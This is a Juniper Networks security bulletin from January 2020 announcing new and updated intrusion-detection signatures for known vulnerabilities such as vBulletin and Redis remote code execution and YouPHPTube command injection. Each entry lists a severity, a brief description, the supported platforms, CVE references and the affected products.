Juniper Networks
Solutions
Products & Services
Company
Partners
Support
Education

Update Details

Security Intelligence Center
Print

Update #3243 (01/14/2020)

4 new signatures:

MEDIUMHTTP:CTS:MCAFEE-DATA-LOSS-IDHTTP: McAfee Data Loss Prevention Information Disclosure
HIGHAPP:REDIS-UNAUTH-RCEHTTP: Redis Unauthenticated Remote Code Execution
MEDIUMHTTP:MAL-REDIRECT-VUL-91HTTP: MAL-REDIRECT Infection-91
HIGHHTTP:CTS:YOUPHPTUBE-ENCODER-CEHTTP: YouPHPTube Encoder getImageMP4 Command Injection

4 updated signatures:

HIGHHTTP:STC:ACTIVEX:MSCOMCTL-OCXHTTP: Microsoft Windows Common Control 'MSCOMCTL.OCX' Unsafe ActiveX Control
HIGHHTTP:PHP:VBULLETIN-RCEHTTP: vBulletin Pre-Auth Remote Code Execution
HIGHHTTP:MISC:ANT-MAN-AUTH-BYHTTP: antMan 0.9.1a CVE-2018-7739 Authentication Bypass
MEDIUMHTTP:SCRIPT-INJ-VUL-90HTTP: SCRIPT-INJ Infection-90


Details of the signatures included within this bulletin:

HTTP:CTS:MCAFEE-DATA-LOSS-ID - HTTP: McAfee Data Loss Prevention Information Disclosure

Severity: MEDIUM

Description:

This signature detects attempts to exploit a known vulnerability against McAfee. A successful attack can lead to sensitive information disclosure.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, isg-3.0.0, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, idp-5.0.0, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, srx-17.4, idp-5.1.110170603, vsrx-15.1

References:

  • url: https://www.exploit-db.com/exploits/38631

HTTP:MISC:ANT-MAN-AUTH-BY - HTTP: antMan 0.9.1a CVE-2018-7739 Authentication Bypass

Severity: HIGH

Description:

This signature detects attempts to exploit a known vulnerability against antMan 0.9.1a. A successful attack can lead to authentication bypass.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, idp-5.0.0, vsrx-17.4, srx-branch-17.4, srx-17.4, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, isg-3.5.141818, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.0.0, idp-5.1.110170603, vsrx-15.1

References:

  • cve: CVE-2018-7739

Affected Products:

  • Antsle antman 0.9.0c

HTTP:PHP:VBULLETIN-RCE - HTTP: vBulletin Pre-Auth Remote Code Execution

Severity: HIGH

Description:

This signature detects attempts to exploit a known vulnerability against vBulletin. A successful attack can lead to arbitrary code execution.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, idp-5.0.0, vsrx-17.4, srx-branch-17.4, srx-17.4, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, isg-3.5.141818, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.0.0, idp-5.1.110170603, vsrx-15.1

References:

  • cve: CVE-2019-16759

Affected Products:

  • Vbulletin vbulletin 5.2.2
  • Vbulletin vbulletin 5.1.2
  • Vbulletin vbulletin 5.5.2
  • Vbulletin vbulletin 5.5.0
  • Vbulletin vbulletin 5.5.1
  • Vbulletin vbulletin 5.0.3
  • Vbulletin vbulletin 5.5.4
  • Vbulletin vbulletin 5.4.3
  • Vbulletin vbulletin 5.1.1
  • Vbulletin vbulletin 5.2.0
  • Vbulletin vbulletin 5.0.0
  • Vbulletin vbulletin 5.1.0
  • Vbulletin vbulletin 5.0.4
  • Vbulletin vbulletin 5.2.1
  • Vbulletin vbulletin 5.0.1
  • Vbulletin vbulletin 5.5.3
  • Vbulletin vbulletin 5.1.3
  • Vbulletin vbulletin 5.0.5
  • Vbulletin vbulletin 5.2.6
  • Vbulletin vbulletin 5.0.2

HTTP:MAL-REDIRECT-VUL-91 - HTTP: MAL-REDIRECT Infection-91

Severity: MEDIUM

Description:

This signature detects an attempt to download exploits from malicious exploit kits that may compromise a computer through various vendor vulnerabilities. Exploit kits are very specific type of toolkits which are being used by cybercriminals to deliver other pieces of malware.

Supported On:

srx-17.3, vsrx-17.4, srx-17.4, vsrx3bsd-18.2, srx-18.2, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, vsrx-19.2, srx-19.2, vsrx3bsd-19.2, srx-19.4, vsrx3bsd-19.4, vsrx-19.4, vsrx-15.1, srx-12.1

HTTP:STC:ACTIVEX:MSCOMCTL-OCX - HTTP: Microsoft Windows Common Control 'MSCOMCTL.OCX' Unsafe ActiveX Control

Severity: HIGH

Description:

This signature detects attempts to exploit a known flaw in the Microsoft Windows Common ActiveX control. An attacker could exploit the vulnerability by constructing a specially crafted Web page or sending a malicious RTF document. Visiting the website with a vulnerable version of Internet Explorer, or opening the RTF document with Office or Wordpad could result in arbitrary code execution.

Supported On:

idp-5.1.110161014, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, srx-17.4, idp-5.1.110170603, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, srx-18.2, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, srx-branch-19.1, vsrx-19.2, srx-19.2, srx-branch-19.2, vsrx3bsd-19.2, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, j-series-9.5, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, idp-4.2.110100823, idp-5.0.0, isg-3.5.0, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.1.134269, vsrx-15.1

References:

  • cve: CVE-2012-0158
  • bugtraq: 52911
  • url: http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html

Affected Products:

  • Microsoft sql_server_2000 SP3
  • Microsoft visual_foxpro 9.0 SP1
  • Microsoft visual_foxpro 8.0
  • Microsoft sql_server_2000 SP1
  • Microsoft sql_server_2000 SP4
  • Microsoft office_2003 SP2
  • Microsoft visual_foxpro 8.0 SP1
  • Microsoft office_2007 SP2
  • Microsoft visual_foxpro 9.0 SP2
  • Microsoft office_2010_(32-bit_edition)
  • Microsoft sql_server_2005_x64_edition SP2
  • Microsoft sql_server_2005_itanium_edition SP2
  • Microsoft sql_server_2005_express_edition SP2
  • Microsoft biztalk_server_2002 SP1
  • Microsoft commerce_server_2002 SP3
  • Microsoft commerce_server_2002 SP4
  • Microsoft commerce_server_2007 SP1
  • Microsoft commerce_server_2007 SP2
  • Microsoft commerce_server_2009
  • Microsoft commerce_server_2009 R2
  • Microsoft visual_basic 6.0
  • Microsoft sql_server_2005_itanium_edition
  • Microsoft sql_server_2005_itanium_edition SP4
  • Microsoft sql_server_2005_express_edition SP3
  • Microsoft sql_server_2005_express_edition SP4
  • Microsoft sql_server_2005_itanium_edition SP3
  • Microsoft sql_server_2005_x64_edition SP3
  • Microsoft sql_server_2008_itanium SP1
  • Microsoft sql_server_2008_x64 SP2
  • Microsoft sql_server_2008_32-bit SP2
  • Microsoft sql_server_2008_itanium SP2
  • Microsoft sql_server_2008_itanium R2
  • Microsoft office_2003 SP1
  • Microsoft sql_server_2000 SP2
  • Microsoft sql_server_2005_x64_edition SP4
  • Microsoft sql_server_2008_32-bit R2
  • Microsoft sql_server_2008_32-bit SP3
  • Microsoft sql_server_2008_itanium SP3
  • Microsoft sql_server_2008_x64 SP3
  • Microsoft sql_server_2008 R2 SP1
  • Microsoft sql_server_2005_x64_edition SP1
  • Microsoft office_2007 SP1
  • Microsoft sql_server_2005_itanium_edition SP1
  • Microsoft sql_server_2008
  • Microsoft commerce_server_2002 SP1
  • Microsoft commerce_server_2002 SP2
  • Microsoft sql_server_2005_express_edition SP1
  • Microsoft office_2010 (32-bit edition) SP1
  • Microsoft office_2003_web_components SP3
  • Microsoft office_2003 SP3
  • Microsoft sql_server_2008 R2
  • Microsoft office_2010
  • Microsoft sql_server_2000
  • Microsoft commerce_server_2007
  • Microsoft visual_basic 6.0 Runtime Extended Files

HTTP:SCRIPT-INJ-VUL-90 - HTTP: SCRIPT-INJ Infection-90

Severity: MEDIUM

Description:

This signature detects an attempt to download exploits from malicious exploit kits that may compromise a computer through various vendor vulnerabilities. Exploit kits are very specific type of toolkits which are being used by cybercriminals to deliver other pieces of malware.

Supported On:

srx-17.3, vsrx-17.4, srx-17.4, vsrx3bsd-18.2, srx-18.2, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, vsrx-19.2, srx-19.2, vsrx3bsd-19.2, srx-19.4, vsrx3bsd-19.4, vsrx-19.4, vsrx-15.1, srx-12.1

APP:REDIS-UNAUTH-RCE - HTTP: Redis Unauthenticated Remote Code Execution

Severity: HIGH

Description:

This signature detects attempts to exploit a known vulnerability against Redis. A successful attack can lead to remote code execution.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, srx-17.4, idp-5.1.110170603, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, idp-5.0.0, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, isg-3.0.0, isg-3.1.134269, vsrx-15.1

References:

  • url: https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

HTTP:CTS:YOUPHPTUBE-ENCODER-CE - HTTP: YouPHPTube Encoder getImageMP4 Command Injection

Severity: HIGH

Description:

This signature detects attempts to exploit a known vulnerability against YouPHPTube. A successful attack can lead to command injection and arbitrary code execution.

Supported On:

idp-5.1.110161014, idp-4.0.0, idp-4.0.110090709, idp-4.0.110090831, idp-4.1.0, mx-16.1, idp-4.2.0, srx-17.3, vmx-17.4, isg-3.5.141818, vsrx-17.4, srx-branch-17.4, isg-3.0.0, isg-3.1.134269, isg-3.1.135801, isg-3.4.0, vsrx3bsd-18.2, isg-3.5.0, srx-19.1, vsrx3bsd-19.1, vsrx-19.1, j-series-9.5, vsrx-19.2, srx-19.2, srx-branch-19.2, idp-4.2.110100823, srx-19.4, vsrx3bsd-19.4, srx-branch-19.4, vsrx-19.4, vmx-19.4, mx-19.4, idp-4.2.110101203, idp-5.1.0, srx-branch-19.1, idp-4.1.110110609, idp-4.1.110110719, mx-11.4, vsrx3bsd-19.2, idp-5.0.0, srx-18.2, isg-3.4.139899, idp-5.0.110121210, srx-12.1, srx-branch-12.1, isg-3.4.140032, idp-5.0.110130325, vsrx-12.1, srx-17.4, idp-5.1.110170603, vsrx-15.1

References:

  • cve: CVE-2019-5128

Affected Products:

  • Youphptube youphptube_encoder 2.3
Site Map
RSS Feeds
Careers
Accessibility
Feedback
Privacy Policy
Legal Notices
Copyright © 1999-2010 Juniper Networks, Inc. All rights reserved.
Help
|
My Account
|
Log Out